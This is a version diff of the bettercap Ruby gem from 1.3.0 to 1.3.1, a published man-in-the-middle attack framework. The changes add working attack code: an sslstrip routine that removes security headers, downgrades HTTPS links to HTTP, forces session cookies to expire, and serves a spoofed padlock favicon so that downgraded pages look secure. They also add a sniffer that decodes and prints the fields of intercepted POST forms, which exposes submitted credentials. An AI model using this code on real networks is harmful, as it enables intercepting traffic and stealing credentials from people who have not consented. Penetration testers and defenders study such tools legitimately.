bettercap 1.3.0 → 1.3.1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 6670a29441233971065df36cbeb7acba16762072
-  data.tar.gz: cc8daa2e7840ddc71b3d5925d114be71b219aba9
+  metadata.gz: f9801e0373d15f52908660dc7aed084d8f91950d
+  data.tar.gz: 50b9f0bc24a28b4b3c7529e5d5fbd65cc96f12c4
 SHA512:
-  metadata.gz: 4a280f7c72b0ae33f3d82614657c927c1d24f11fb828df64e954f60021ed7a87c623ec939dc8715f542510d5268f2413325627d38e56a0c5831774aa90e95931
-  data.tar.gz: 5cb2e4adada12bcb02a70b73a07477063423bc0ed9a96ec510de132a00b904152839a2cc8682f6c47b221425880c89d22874a4937c215ee06347b920047178fd
+  metadata.gz: d9c118a677a01f88be5ca3e064e32852912f97a9e8487bd820defc650a73d684d4a78c433e9a7f2bc56d13716c08c4a1eb776d1242ee34910783b3beb00de981
+  data.tar.gz: 59d4054d3ddda701f44967074ac6042d6bbbcbd72306cd9808c6069ebec613e3d43c0d93b98d0b43a437770215ecb20ec19357b920191054455bdc33ab13578f

data/bin/bettercap

@@ -71,11 +71,10 @@ begin
 rescue SystemExit, Interrupt
   BetterCap::Logger.raw "\n"
 
-rescue OptionParser::InvalidOption => e
-  BetterCap::Logger.error e.message
-
-rescue OptionParser::AmbiguousOption => e
-  BetterCap::Logger.error e.message
+rescue OptionParser::InvalidOption,
+       OptionParser::AmbiguousOption,
+       OptionParser::MissingArgument => e
+  BetterCap::Logger.error "'#{e.message.capitalize}', verify your command line arguments executing 'bettercap --help'."
 
 rescue BetterCap::Error => e
   BetterCap::Logger.error e.message

data/lib/bettercap.rb

@@ -20,6 +20,7 @@ require 'optparse'
 require 'colorize'
 require 'packetfu'
 require 'ipaddr'
+require 'uri'
 
 Object.send :remove_const, :Config rescue nil
 Config = RbConfig

data/lib/bettercap/context.rb

@@ -144,7 +144,11 @@ class Context
             original = response
 
             begin
-              mod.on_request request, response
+              if response.nil?
+                mod.on_pre_request request
+              else
+                mod.on_request request, response
+              end
             rescue Exception => e
               Logger.warn "Error with proxy module: #{e.message}"
               response = original

data/lib/bettercap/firewalls/linux.rb

@@ -16,27 +16,32 @@ module BetterCap
 module Firewalls
 # Linux firewall class.
 class Linux < Base
+
+  IPV4_PATH = "/proc/sys/net/ipv4"
+  IP_FORWARD_PATH = IPV4_PATH + "/ip_forward"
+  ICMP_BCAST_PATH = IPV4_PATH + "/icmp_echo_ignore_broadcasts"
+  SEND_REDIRECTS_PATH = IPV4_PATH + "/conf/all/send_redirects"
   # If +enabled+ is true will enable packet forwarding, otherwise it will
   # disable it.
   def enable_forwarding(enabled)
-    Shell.execute("echo #{enabled ? 1 : 0} > /proc/sys/net/ipv4/ip_forward")
+    File.open(IP_FORWARD_PATH) { |f| f.puts "#{enabled ? 1 : 0}" }
   end
 
   # Return true if packet forwarding is currently enabled, otherwise false.
   def forwarding_enabled?
-    Shell.execute('cat /proc/sys/net/ipv4/ip_forward').strip == '1'
+    File.open(IP_FORWARD_PATH) { |f| f.read.strip == '1' }
   end
 
   # If +enabled+ is true will enable packet icmp_echo_ignore_broadcasts, otherwise it will
   # disable it.
   def enable_icmp_bcast(enabled)
-    Shell.execute("echo #{enabled ? 0 : 1} > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts")
+    File.open(ICMP_BCAST_PATH) { |f| f.puts "#{enabled ? 1 : 0}" }
   end
 
   # If +enabled+ is true will enable send_redirects, otherwise it will
   # disable it.
   def enable_send_redirects(enabled)
-    Shell.execute("echo #{enabled ? 0 : 1} > /proc/sys/net/ipv4/conf/all/send_redirects")
+    File.open(SEND_REDIRECTS_PATH) { |f| f.puts "#{enabled ? 1 : 0}" }
   end
 
   # Apply the +r+ BetterCap::Firewalls::Redirection port redirection object.

data/lib/bettercap/options.rb

@@ -520,8 +520,8 @@ class Options
 
   # Print the starting status message.
   def starting_message
-    on = '✔'.green
-    off = '✘'.red
+    on = 'on'.green
+    off = 'off'.red
     status = {
       'spoofing'    => if has_spoofer? then on else off end,
       'discovery'   => if !target.nil? or arpcache then off else on end,

data/lib/bettercap/proxy/module.rb

@@ -18,6 +18,9 @@ class Module
   @@path    = File.dirname(__FILE__) + '/modules/'
   @@modules = []
 
+  def on_pre_request( request ); end
+  def on_request( request, response ); end
+
   # Return a list of available builtin proxy module names.
   def self.available
     avail = []

data/lib/bettercap/proxy/proxy.rb

@@ -133,7 +133,7 @@ class Proxy
     rescue Exception => e
       if request.host
         Logger.warn "Error while serving #{request.host}#{request.url}: #{e.inspect}"
-        Logger.debug e.backtrace.join("\n")
+        Logger.warn e.backtrace.join("\n")
       end
     end
 

data/lib/bettercap/proxy/request.rb

@@ -29,7 +29,7 @@ class Request
   # Content length.
   attr_reader :content_length
   # Request body.
-  attr_reader :body
+  attr_accessor :body
   # Client address.
   attr_accessor :client
   # Client port.
@@ -72,6 +72,20 @@ class Request
     end
   end
 
+  # Return a Request object from a +raw+ string.
+  def self.parse(raw)
+    req = Request.new
+    lines = raw.split("\n")
+    lines.each_with_index do |line,i|
+      req << line
+      if line.chomp == ''
+        req.body = lines[i + 1..lines.size].join("\n")
+        break
+      end
+    end
+    req
+  end
+
   # Parse a single request line, patch it if needed and append it to #lines.
   def <<(line)
     line = line.chomp
@@ -128,6 +142,7 @@ class Request
     @lines.join("\n") + "\n" + ( @body || '' )
   end
 
+  # Return the full request URL trimming it at +max_length+ characters.
   def to_url(max_length = 50)
     schema = if port == 443 then 'https' else 'http' end
     url = "#{schema}://#{@host}#{@url}"
@@ -141,14 +156,27 @@ class Request
   end
 
   # If the header with +name+ is found, then a +value+ is assigned to it.
+  # If +value+ is null and the header is found, it will be removed.
   def []=(name, value)
+    found = false
     @lines.each_with_index do |line,i|
       if line =~ /^#{name}:\s*.+$/i
-        @headers[name] = value
-        @lines[i] = "#{name}: #{value}"
+        found = true
+        if value.nil?
+          @headers.delete(name)
+          @lines.delete_at(i)
+        else
+          @headers[name] = value
+          @lines[i] = "#{name}: #{value}"
+        end
         break
       end
     end
+
+    if !found and !value.nil?
+      @headers[name] = value
+      @lines << "#{name}: #{value}"
+    end
   end
 end
 end

data/lib/bettercap/proxy/response.rb

@@ -31,6 +31,22 @@ class Response
   # Response body.
   attr_accessor :body
 
+  # Return a 200 response object reading the file +filename+ with the specified
+  # +content_type+.
+  def self.from_file( filename, content_type )
+    r = Response.new
+    data = File.read(filename)
+
+    r << "HTTP/1.1 200 OK"
+    r << "Connection: close"
+    r << "Content-Length: #{data.bytesize}"
+    r << "Content-Type: #{content_type}"
+    r << "\n"
+    r << data
+
+    r
+  end
+
   # Initialize this response object state.
   def initialize
     @content_type = nil

data/lib/bettercap/proxy/sslstrip/strip.rb

@@ -19,41 +19,99 @@ class Strip
   # Maximum number of redirects to detect a HTTPS redirect loop.
   MAX_REDIRECTS = 3
   # Regular expression used to parse HTTPS urls.
-  HTTPS_URL_RE = /(https:\/\/[^"'\/]+)/i
+  HTTPS_URL_RE  = /(https:\/\/[^"'\/]+)/i
 
   # Create an instance of this object.
   def initialize
     @urls    = URLMonitor.new
     @cookies = CookieMonitor.new
+    @favicon = Response.from_file( File.dirname(__FILE__) + '/lock.ico', 'image/x-icon' )
   end
 
   # Check if the +request+ is a result of a stripped link/redirect and handle
   # cookies cleaning.
   # Return a response object or nil if the request must be performed.
   def preprocess( request )
+    process_headers!(request)
+    response = process_cookies!(request)
+    if response.nil?
+      process_stripped!(request)
+      response = spoof_favicon!(request)
+    end
+    response
+  end
+
+  # Process the +request+ and if it's a redirect to a HTTPS url patch the
+  # Location header and retry.
+  # Process the +response+ and replace every https link in its body with
+  # http counterparts.
+  def process( request, response )
+    # check for a redirect
+    if process_redirection!( request, response )
+      # retry the request
+      return true
+    end
+
+    process_body!( request, response )
+
+    # do not retry the request.
+    false
+  end
+
+  private
+
+  # Clean some headers from +request+.
+  def process_headers!(request)
+    request['Accept-Encoding']           = nil
+    request['If-None-Match']             = nil
+    request['If-Modified-Since']         = nil
+    request['Upgrade-Insecure-Requests'] = nil
+    request['Pragma']                    = 'no-cache'
+  end
+
+  # If +request+ has unknown session cookies, create a client redirection
+  # to make them expire.
+  def process_cookies!(request)
+    response = nil
     # check for cookies.
     unless @cookies.is_clean?(request)
       Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending expired cookies for '#{request.host}'."
       expired = @cookies.get_expired_headers!(request)
 
-      return build_expired_cookies( expired, request )
+      response = build_expired_cookies( expired, request )
     end
+    response
+  end
 
+  # If the +request+ is a result of a sslstripping operation,
+  # proxy it via SSL.
+  def process_stripped!(request)
     # check for stripped urls.
     link = @urls.normalize( request.host )
     if request.port == 80 and @urls.was_stripped?( request.client, link )
       Logger.debug "[#{'SSLSTRIP'.green} #{request.client}] Found stripped HTTPS link '#{link}', proxying via SSL."
       request.port = 443
     end
+  end
 
+  # If +request+ is the favicon of a stripped host, send our spoofed lock icon.
+  def spoof_favicon!(request)
+    link = @urls.normalize( request.host )
+    if @urls.was_stripped?( request.client, link ) and is_favicon?(request)
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending spoofed favicon '#{request.to_url }'."
+      return @favicon
+    end
     nil
   end
 
-  # Process the +request+ and if it's a redirect to a HTTPS url patch the
-  # Location header and retry.
-  # Process the +response+ and replace every https link in its body with
-  # http counterparts.
-  def process( request, response )
+  # Return true if +request+ is a favicon request.
+  def is_favicon?(request)
+    ( request.url.include?('.ico') or request.url.include?('favicon') )
+  end
+
+  # If the +response+ is a redirect to a HTTPS location, patch the +response+ and
+  # retry the +request+ via SSL.
+  def process_redirection!(request,response)
     # check for a redirect
     if response['Location'].start_with?('https://')
       link = @urls.normalize( response['Location'] )
@@ -68,17 +126,24 @@ class Strip
       # retry the request if possible
       return true
     end
+    false
+  end
 
+  # Process the +response+ body and strip out every HTTPS link.
+  def process_body!(request, response)
     # parse body
     links = []
-    response.body.scan( HTTPS_URL_RE ).uniq.each do |link|
-      if link[0].include?('.')
-        link       = @urls.normalize( link[0] )
-        downgraded = @urls.downgrade( link )
-
-        links << [link, downgraded]
+    begin
+      response.body.scan( HTTPS_URL_RE ).uniq.each do |link|
+        if link[0].include?('.')
+          link       = @urls.normalize( link[0] )
+          downgraded = @urls.downgrade( link )
+
+          links << [link, downgraded]
+        end
       end
-    end
+    # handle errors due to binary content
+    rescue; end
 
     unless links.empty?
       Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
@@ -89,13 +154,10 @@ class Strip
         response.body.gsub!( link, downgraded )
       end
     end
-
-    # do not retry the request.
-    false
   end
 
-  private
-
+  # Return a 302 Redirect BetterCap::Proxy::Response object for the
+  # +request+, using +expired+ cookie headers to kill a client session.
   def build_expired_cookies( expired, request )
     resp = Response.new
 

data/lib/bettercap/proxy/streamer.rb

@@ -47,6 +47,9 @@ class Streamer
       end
 
       if r.nil?
+        # call modules on_pre_request
+        @processor.call( request, nil )
+
         self.send( "do_#{request.verb}", request, response )
       else
         response = r
@@ -70,6 +73,7 @@ class Streamer
         end
       end
 
+      # call modules on_request
       @processor.call( request, response )
 
       client.write response.to_s

data/lib/bettercap/sniffer/parsers/post.rb

@@ -19,7 +19,25 @@ class Post < Base
   def on_packet( pkt )
     s = pkt.to_s
     if s =~ /POST\s+[^\s]+\s+HTTP.+/
-      StreamLogger.log_raw( pkt, "POST\n", pkt.payload )
+      begin
+        req = BetterCap::Proxy::Request.parse(pkt.payload)
+        # the packet could be incomplete
+        unless req.body.nil? or req.body.empty?
+          msg = "\n[#{'HEADERS'.green}]\n\n"
+          req.headers.each do |name,value|
+            msg << "  #{name.blue} : #{value.yellow}\n"
+          end
+          msg << "\n[#{'BODY'.green}]\n\n"
+
+          req.body.split('&').each do |v|
+            name, value = v.split('=')
+            msg << "  #{name.blue} : #{URI.unescape(value).yellow}\n"
+          end
+
+          StreamLogger.log_raw( pkt, "POST", req.to_url(1000) )
+          Logger.raw "#{msg}\n"
+        end
+      rescue; end
     end
   end
 end

data/lib/bettercap/version.rb

@@ -11,7 +11,7 @@ This project is released under the GPL 3 license.
 =end
 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.3.0'
+  VERSION = '1.3.1'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.3.0
+  version: 1.3.1
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-01-24 00:00:00.000000000 Z
+date: 2016-01-26 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -29,6 +29,9 @@ dependencies:
   requirement: !ruby/object:Gem::Requirement
     requirements:
     - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.1'
+    - - ">="
       - !ruby/object:Gem::Version
         version: 1.1.10
   type: :runtime
@@ -36,6 +39,9 @@ dependencies:
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
     - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.1'
+    - - ">="
       - !ruby/object:Gem::Version
         version: 1.1.10
 - !ruby/object:Gem::Dependency
@@ -80,7 +86,9 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: 0.8.0
-description: A complete, modular, portable and easily extensible MITM framework.
+description: BetterCap is the state of the art, modular, portable and easily extensible
+  MITM framework featuring ARP and ICMP spoofing, sslstripping, credentials harvesting
+  and more.
 email: evilsocket@gmail.com
 executables:
 - bettercap
@@ -126,6 +134,7 @@ files:
 - lib/bettercap/proxy/request.rb
 - lib/bettercap/proxy/response.rb
 - lib/bettercap/proxy/sslstrip/cookiemonitor.rb
+- lib/bettercap/proxy/sslstrip/lock.ico
 - lib/bettercap/proxy/sslstrip/strip.rb
 - lib/bettercap/proxy/sslstrip/urlmonitor.rb
 - lib/bettercap/proxy/stream_logger.rb
@@ -152,7 +161,7 @@ files:
 - lib/bettercap/version.rb
 homepage: http://github.com/evilsocket/bettercap
 licenses:
-- GPL3
+- GPL-3.0
 metadata: {}
 post_install_message: 
 rdoc_options: